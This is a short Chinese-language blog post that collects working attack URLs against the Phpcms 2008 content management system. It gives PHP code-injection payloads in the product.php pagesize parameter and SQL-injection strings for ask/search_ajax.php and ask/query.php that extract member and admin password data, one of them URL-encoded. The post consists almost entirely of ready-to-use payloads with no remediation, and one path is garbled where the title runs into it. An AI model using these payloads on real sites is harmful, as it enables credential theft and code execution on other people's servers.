Phpcms 2008 漏洞整理

  • A+
所属分类:漏洞时代
摘要

盲注flash_upload.php?modelid=1 product.php pagesize参数代码注射漏洞yp/product.php?pagesize=${@print(md5(admin))}

盲注

flash_upload.php?modelid=1

 

product.php pagesize参数代码注射漏洞

yp/product.php?pagesize=${@print(md5(admin))}

yp/product.php?pagesize=${@phpinfo()}

 

 askPhpcms 2008 漏洞整理arch_ajax.php SQL注射漏洞
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
ask/query.php注入漏洞
ask/query.php?action=edit_answer&dosubmit=1&pid=2&posts[%6D%65%73%73%61%67%65%60%3D%28%73%65%6C%65%63%74%20%70%61%73%73%77%6F%72%64%20%66%72%6F%6D%20%70%68%70%63%6D%73%5F%6D%65%6D%62%65%72%20%77%68%65%72%65%20%67%72%6F%75%70%69%64%3D%31%29%20%77%68%65%72%65%20%61%73%6B%69%64%3D%32%23]

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: